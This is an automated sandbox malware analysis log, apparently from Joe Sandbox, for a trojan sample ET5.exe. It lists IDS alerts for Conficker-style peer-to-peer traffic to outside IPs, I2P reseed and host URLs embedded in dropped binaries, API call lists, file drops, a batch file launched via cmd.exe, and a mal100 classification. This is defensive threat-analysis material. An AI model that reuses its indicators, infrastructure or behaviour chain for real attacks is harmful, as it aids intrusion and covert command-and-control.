Source: Network trafficSuricata IDS: 2009206 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 4) : 192.168.2.5:27080 -> 174.2.11.191:17369
Source: Network trafficSuricata IDS: 2009208 - Severity 1 - ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16) : 192.168.2.5:27080 -> 2.178.163.167:30497
Source: Network trafficSuricata IDS: 2009205 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 1) : 192.168.2.5:27080 -> 45.8.159.106:17893
Source: Network trafficSuricata IDS: 2009207 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5) : 192.168.2.5:27080 -> 102.130.123.16:23055
Source: Network trafficSuricata IDS: 2009208 - Severity 1 - ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16) : 192.168.2.5:27080 -> 120.155.52.253:16538
Source: Network trafficSuricata IDS: 2009207 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5) : 192.168.2.5:27080 -> 101.184.38.180:14558
Source: Network trafficSuricata IDS: 2009205 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 1) : 192.168.2.5:27080 -> 5.187.75.159:65351
Source: Network trafficSuricata IDS: 2009206 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 4) : 192.168.2.5:27080 -> 101.184.38.180:14558
Source: Network trafficSuricata IDS: 2009208 - Severity 1 - ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16) : 192.168.2.5:27080 -> 45.61.165.224:15027
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9152A1A recv,WSAGetLastError,22_2_00007FF8B9152A1A
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: http://127.0.0.1:8118
Source: ET5.exeString found in binary or memory: http://digitalbush.com/projects/masked-input-plugin/#license)
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: http://identiguy.i2p/hosts.txt
Source: update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000016.00000002.4536791919.000001B980F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtySDD
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: http://rus.i2p/hosts.txt
Source: update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3C
Source: main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtxyz/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: ET5.exeString found in binary or memory: http://www.mozilla.org/editor/midasdemo/securityprefs.html
Source: ET5.exeString found in binary or memory: http://www.steema.com/linkIn/TeeChartForXE2
Source: ET5.exeString found in binary or memory: http://www.steema.com/linkIn/TeeChartForXE2H
Source: ET5.exeString found in binary or memory: http://www.steema.com/linkIn/TeeChartForXE2UH
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://banana.incognet.io/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://i2p.ghativega.in/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: https://i2p.mooo.com/netDb/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://i2p.novg.net/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: https://netdb.i2p2.no/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed.diva.exchange/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: https://reseed.i2p-projekt.de/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed.i2pgit.org/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed.memcpy.io/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed.onion.im/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed.stormycloud.org/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://reseed2.i2p.net/
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr, gBXHuZY0.22.drString found in binary or memory: https://www2.mk16.de/
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489929A inet_addr,ntohl,11_2_00007FF70489929A
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,11_2_00007FF70489292E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile deleted: C:\Windows\Temp\PrnaubOU
Source: C:\Users\user\Desktop\ET5.exeCode function: 0_2_03794B4E0_2_03794B4E
Source: C:\Users\user\Desktop\ET5.exeCode function: 0_2_03795B420_2_03795B42
Source: C:\Users\user\Desktop\ET5.exeCode function: 0_2_037A53EA0_2_037A53EA
Source: C:\Users\user\Desktop\ET5.exeCode function: 0_2_037AD1220_2_037AD122
Source: C:\Users\user\Desktop\ET5.exeCode function: 0_2_037A701E0_2_037A701E
Source: C:\Users\user\Desktop\ET5.exeCode function: 0_2_037960D20_2_037960D2
Source: C:\Users\user\Desktop\ET5.exeCode function: 0_2_03797F320_2_03797F32
Source: C:\Users\user\Desktop\ET5.exeCode function: 0_2_0379CDAA0_2_0379CDAA
Source: C:\Users\user\Desktop\ET5.exeCode function: 0_2_03799CFA0_2_03799CFA
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489DE8A11_2_00007FF70489DE8A
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489E4E011_2_00007FF70489E4E0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF70887C4C022_2_00007FF70887C4C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF70888209822_2_00007FF708882098
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91609C022_2_00007FF8B91609C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91925F022_2_00007FF8B91925F0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA50F02022_2_00007FF8BA50F020
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFABCBC022_2_00007FF8BFABCBC0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB5EB4022_2_00007FF8BFB5EB40
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB8A8B522_2_00007FF8BFB8A8B5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB8A78B22_2_00007FF8BFB8A78B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB9071022_2_00007FF8BFB90710
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB8A64322_2_00007FF8BFB8A643
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB8A55822_2_00007FF8BFB8A558
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll 77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
Source: C:\Windows\System32\icacls.exeProcess token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: String function: 00007FF7048914E2 appears 295 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8B9181292 appears 515 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BFB81292 appears 377 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BFABA202 appears 345 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BFB52FD2 appears 387 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BA501292 appears 394 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF7088799E2 appears 303 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8B9151292 appears 462 times
Source: rVtDGbMQ.22.drStatic PE information: Number of sections : 11 > 10
Source: termsrv32.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: L0FsI2PI.22.drStatic PE information: Number of sections : 11 > 10
Source: samctl.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: gBXHuZY0.22.drStatic PE information: Number of sections : 11 > 10
Source: cnccli.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: y8J74cEH.22.drStatic PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: ypqwg32t.22.drStatic PE information: Number of sections : 11 > 10
Source: ET5.exeStatic PE information: Number of sections : 11 > 10
Source: evtsrv.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: 3rVpJMV7.22.drStatic PE information: Number of sections : 11 > 10
Source: fYg6Jeg5.22.drStatic PE information: Number of sections : 11 > 10
Source: libi2p.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: prgmgr.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: rmcjgYnL.22.drStatic PE information: Number of sections : 11 > 10
Source: rdpctl.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: ET5.exe, 00000000.00000000.2042011361.000000000115D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIntegrator.exe@ vs ET5.exe
Source: ET5.exe, 00000000.00000002.2048458739.00000000031B6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs ET5.exe
Source: ET5.exe, 00000002.00000002.4528360552.0000000003036000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs ET5.exe
Source: ET5.exeBinary or memory string: OriginalFilenameIntegrator.exe@ vs ET5.exe
Source: classification engineClassification label: mal100.troj.evad.winEXE@38/76@0/37
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,11_2_00007FF70489855D
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF7048AB558 DeleteCriticalSection,FindClose,FindNextFileA,FindResourceA,11_2_00007FF7048AB558
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF708878C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,22_2_00007FF708878C4A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF708878C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,22_2_00007FF708878C4A
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:652:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3836:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
Source: C:\Users\user\Desktop\ET5.exeFile created: C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.batJump to behavior
Source: C:\Users\user\Desktop\ET5.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat"
Source: ET5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeFile read: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: ET5.exeString found in binary or memory: gfx/loading.gif">
Source: ET5.exeString found in binary or memory: /gfx/loading.gif
Source: ET5.exeString found in binary or memory: gfx/loading.gif
Source: ET5.exeString found in binary or memory: Execute via &Default browser/Launch default browser and execute application.
Source: unknownProcess created: C:\Users\user\Desktop\ET5.exe "C:\Users\user\Desktop\ET5.exe"
Source: unknownProcess created: C:\Users\user\Desktop\ET5.exe C:\Users\user\Desktop\ET5.exe
Source: C:\Users\user\Desktop\ET5.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
